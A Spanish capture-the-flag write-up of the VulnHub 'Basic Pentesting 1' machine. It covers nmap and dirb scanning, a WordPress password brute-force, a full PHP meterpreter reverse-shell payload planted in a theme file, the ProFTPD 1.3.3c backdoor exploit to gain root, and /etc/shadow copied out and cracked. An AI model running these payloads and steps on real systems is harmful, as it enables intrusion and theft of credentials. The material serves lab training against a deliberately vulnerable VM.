solución al CTF csec

El domingo por la tarde estaba aburrido, y se me ocurrió hacer un ctf sencillito y rápido de vulnhub. En este caso fue csec, Basic Pentesting 1. Aunque en realidad, tardé un poquito más de una hora. Os lo podéis descargar de aquí:

https://www.vulnhub.com/entry/basic-pentesting-1,216/

 

La IP de la máquina atacante será 192.168.1.56.

En primer lugar, escaneamos la red entera

nmap -sS -sV -O 192.168.1.0/24

Nmap scan report for vtcsec.home (192.168.1.85)

Host is up (0.00057s latency).

Not shown: 997 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp ProFTPD 1.3.3c

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

MAC Address: 08:00:27:AD:0D:CB (Oracle VirtualBox virtual NIC)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Bien, ya hemos descubierto que la IP de nuestra víctima es 192.168.1.87.

Entramos en la página web

 

Hacemos un escaneo de directorios

dirb http://192.168.1.85 -o dirb

-----------------

DIRB v2.22

By The Dark Raver

-----------------

OUTPUT_FILE: dirb

START_TIME: Sun Feb 16 18:37:29 2020

URL_BASE: http://192.168.1.85/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.85/ ----

+ http://192.168.1.85/index.html (CODE:200|SIZE:177)

==> DIRECTORY: http://192.168.1.85/secret/

+ http://192.168.1.85/server-status (CODE:403|SIZE:300)

---- Entering directory: http://192.168.1.85/secret/ ----

+ http://192.168.1.85/secret/index.php (CODE:301|SIZE:0)

==> DIRECTORY: http://192.168.1.85/secret/wp-admin/

==> DIRECTORY: http://192.168.1.85/secret/wp-content/

==> DIRECTORY: http://192.168.1.85/secret/wp-includes/

+ http://192.168.1.85/secret/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.1.85/secret/wp-admin/ ----

+ http://192.168.1.85/secret/wp-admin/admin.php (CODE:302|SIZE:0)

==> DIRECTORY: http://192.168.1.85/secret/wp-admin/css/

==> DIRECTORY: http://192.168.1.85/secret/wp-admin/images/

==> DIRECTORY: http://192.168.1.85/secret/wp-admin/includes/

+ http://192.168.1.85/secret/wp-admin/index.php (CODE:302|SIZE:0)

==> DIRECTORY: http://192.168.1.85/secret/wp-admin/js/

==> DIRECTORY: http://192.168.1.85/secret/wp-admin/maint/

==> DIRECTORY: http://192.168.1.85/secret/wp-admin/network/

==> DIRECTORY: http://192.168.1.85/secret/wp-admin/user/

---- Entering directory: http://192.168.1.85/secret/wp-content/ ----

+ http://192.168.1.85/secret/wp-content/index.php (CODE:200|SIZE:0)

==> DIRECTORY: http://192.168.1.85/secret/wp-content/plugins/

==> DIRECTORY: http://192.168.1.85/secret/wp-content/themes/

---- Entering directory: http://192.168.1.85/secret/wp-includes/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/css/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/images/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/includes/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/js/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/maint/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.85/secret/wp-admin/network/ ----

+ http://192.168.1.85/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)

+ http://192.168.1.85/secret/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.1.85/secret/wp-admin/user/ ----

+ http://192.168.1.85/secret/wp-admin/user/admin.php (CODE:503|SIZE:288)

+ http://192.168.1.85/secret/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.1.85/secret/wp-content/plugins/ ----

+ http://192.168.1.85/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.1.85/secret/wp-content/themes/ ----

+ http://192.168.1.85/secret/wp-content/themes/index.php (CODE:200|SIZE:0)

-----------------

END_TIME: Sun Feb 16 18:37:57 2020

DOWNLOADED: 36896 - FOUND: 13

En el subdirectorio secret tenemos un blog

 

Según los subdirectorios, tenemos que este blog está realizado en wordpress. Por tanto, vamos a ver sus vulnerabilidades.

wpscan --url http://192.168.1.85/secret --enumerate u --output wpscan1

Obtenemos la siguiente salida:

_______________________________________________________________

__ _______ _____

\ \ / / __ \ / ____|

\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®

\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

\ /\ / | | ____) | (__| (_| | | | |

\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 3.7.5

@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

_______________________________________________________________

#[34m[i]#[0m Updating the Database ...

#[34m[i]#[0m Update completed.

#[32m[+]#[0m URL: http://192.168.1.85/secret/

#[32m[+]#[0m Started: Sun Feb 16 18:43:21 2020

Interesting Finding(s):

#[32m[+]#[0m http://192.168.1.85/secret/

| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)

| Found By: Headers (Passive Detection)

| Confidence: 100%

#[32m[+]#[0m http://192.168.1.85/secret/xmlrpc.php

| Found By: Direct Access (Aggressive Detection)

| Confidence: 100%

| References:

| - http://codex.wordpress.org/XML-RPC_Pingback_API

| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner

| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos

| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login

| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

#[32m[+]#[0m http://192.168.1.85/secret/readme.html

| Found By: Direct Access (Aggressive Detection)

| Confidence: 100%

#[32m[+]#[0m Upload directory has listing enabled: http://192.168.1.85/secret/wp-content/uploads/

| Found By: Direct Access (Aggressive Detection)

| Confidence: 100%

#[32m[+]#[0m http://192.168.1.85/secret/wp-cron.php

| Found By: Direct Access (Aggressive Detection)

| Confidence: 60%

| References:

| - https://www.iplocation.net/defend-wordpress-from-ddos

| - https://github.com/wpscanteam/wpscan/issues/1299

#[32m[+]#[0m WordPress version 4.9.13 identified (Latest, released on 2019-12-12).

| Found By: Emoji Settings (Passive Detection)

| - http://192.168.1.85/secret/, Match: '-release.min.js?ver=4.9.13'

| Confirmed By: Meta Generator (Passive Detection)

| - http://192.168.1.85/secret/, Match: 'WordPress 4.9.13'

#[34m[i]#[0m The main theme could not be detected.

#[34m[i]#[0m User(s) Identified:

#[32m[+]#[0m admin

| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

| Confirmed By: Login Error Messages (Aggressive Detection)

#[33m[!]#[0m No WPVulnDB API Token given, as a result vulnerability data has not been output.

#[33m[!]#[0m You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.

#[32m[+]#[0m Finished: Sun Feb 16 18:43:23 2020

#[32m[+]#[0m Requests Done: 61

#[32m[+]#[0m Cached Requests: 5

#[32m[+]#[0m Data Sent: 12.369 KB

#[32m[+]#[0m Data Received: 14.531 MB

#[32m[+]#[0m Memory used: 100.761 MB

#[32m[+]#[0m Elapsed time: 00:00:02

Vemos que hay un usuario admin.

Creamos un archivo con los usuarios encontrados, en este caso uno, admin:

echo admin > admin.txt

Realizamos un ataque a fuerza bruta

wpscan --url http://192.168.1.85/secret --usernames admin.txt --passwords /usr/share/wordlists/metasploit/unix_passwords.txt

[…]

+] Performing password attack on Wp Login against 1 user/s

Trying admin / admin Time: 00:00:00 <=============> (5 / 5) 100.00% Time: 00:00:00

[SUCCESS] - admin / admin

[…]

Bien, la contraseña es admin.

Nos vamos al directorio de administración

http://192.168.1.85/secret/wp-admin

 

Ingresamos el usuario y la contraseña, admin y admin

 

Nos vamos a Appearance → Themes → Editor y seleccionamos index.php

Bien, vamos a crear una reverse shell en php

 

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=3333 -f raw > shell.php

Bien, editamos el archivo generado dejándolo tal cual se muestra:

/**/ error_reporting(0); $ip = '192.168.1.56'; $port = 3333; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Llevamos este código a index.php

 

Pulsamos el botón Update File

Ponemos en marcha metasploit

msfconsole

 

Escribimos las opciones:

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp

PAYLOAD => php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 0.0.0.0

LHOST => 0.0.0.0

msf5 exploit(multi/handler) > set LPORT 3333

LPORT => 3333

msf5 exploit(multi/handler) > set ExitOnSession False

ExitOnSession => false

msf5 exploit(multi/handler) > exploit -j -z

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:3333

msf5 exploit(multi/handler) >

En otra pestaña del navegador ponemos:

http://192.168.1.85/secret/index.php

Y en nuestra ventana de metasploit ocurre lo siguiente:

 

Ya estamos dentro.

Abriremos una shell

meterpreter > shell

Process 1408 created.

Channel 0 created.

Miramos a ver quiénes somos

whoami

www-data

Por tanto, somos el usuario www-data.

Veamos qué versión de GNU/Linux tenemos

uname -r

4.10.0-28-generic

cat /etc/lsb-release

DISTRIB_ID=Ubuntu

DISTRIB_RELEASE=16.04

DISTRIB_CODENAME=xenial

DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"

si nos vamos al directorio /home obtenemos una carpeta llamada marlinspike, por lo que va a ser un usuario.

De hecho, tenemos permiso para ver lo que hay dentro:

ls

046e85f6fe460de94fd46198feef4d07-backdoored_proftpd-1.3.3c.tar.gz

046e85f6fe460de94fd46198feef4d07-backdoored_proftpd-1.3.3c.tar.gz.bak

Desktop

Documents

Downloads

Music

Pictures

Public

Templates

Videos

backdoored_proftpd-1.3.3c

examples.desktop

latest.tar.gz

proftpd-1.3.3c

proftpd-1.3.3c.tar.bz2

proftpd-1.3.3c.tar.bz2.bak

wordpress

Observamos proftpd-1.3.3c, esta es una versión del servidor ftp la cual fué infectada con una puerta trasera. Podremos descargar el exploit y usarlo, pero en nuestro caso, usaremos el módulo de metasploit. Para ello, saldremos de la shell.

Exit

meterpreter >

Usamos background para volver a metasploit.

meterpreter > background

[*] Backgrounding session 1...

msf5 exploit(multi/handler) >

msf5 exploit(multi/handler) > use exploit/unix/ftp/proftpd_133c_backdoor

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show targets

Exploit targets:

Id Name

-- ----

0 Automatic

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

RPORT 21 yes The target port (TCP)

Exploit target:

Id Name

-- ----

0 Automatic

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.1.85

RHOSTS => 192.168.1.85

msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.1.56:4444

[*] 192.168.1.85:21 - Sending Backdoor Command

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo 7zz0sztruywJukhx;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket A

[*] A: "7zz0sztruywJukhx\r\n"

[*] Matching...

[*] B is input...

[*] Command shell session 2 opened (192.168.1.56:4444 -> 192.168.1.85:44476) at 2020-02-17 11:53:03 +0100

whoami

root

Pues ya somos administradores del sistema.

Vamos a intentar conseguir las contraseñas de los usuarios

mkdir /var/www/html/secret/passwords

cp /etc/passwd* /var/www/html/secret/passwords

cp /etc/shadow /var/www/html/secret/passwords

cd /var/www/html/secret/passwords

tar cvfz passwords.tar.gz *

passwd

passwd-

shadow

En otra terminal:

Descargamos los archivos

wget http://192.168.1.85/secret/passwords/passwords.tar.gz

Descomprimimos

tar xvfz passwords.tar.gz

Craquearemos ahora la contraseña:

root@kali:~/csec# john shadow

Using default input encoding: UTF-8

Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])

Cost 1 (iteration count) is 5000 for all loaded hashes

Will run 2 OpenMP threads

Proceeding with single, rules:Single

Press 'q' or Ctrl-C to abort, almost any other key for status

marlinspike (marlinspike)

1g 0:00:00:00 DONE 1/3 (2020-02-17 12:28) 3.571g/s 28.57p/s 28.57c/s 28.57C/s marlinspike..marlin

Use the "--show" option to display all of the cracked passwords reliably

Session completed

Como veíamos en la salida de nmap, también tenemos un servidor ssh corriendo, así que podremos acceder desde allí

root@kali:~/csec# ssh marlinspike@192.168.1.85

marlinspike@192.168.1.85's password:

Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

608 packages can be updated.

445 updates are security updates.

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

marlinspike@vtcsec:~$

Ahora, vamos a activar la cuenta root de ubuntu, para ello, usaremos sudo -i, y nos pedirá la contraseña que queramos para el usuario root:

marlinspike@vtcsec:~/Documents$ sudo -i

[sudo] password for marlinspike:

root@vtcsec:~#

Y ya hemos acabado.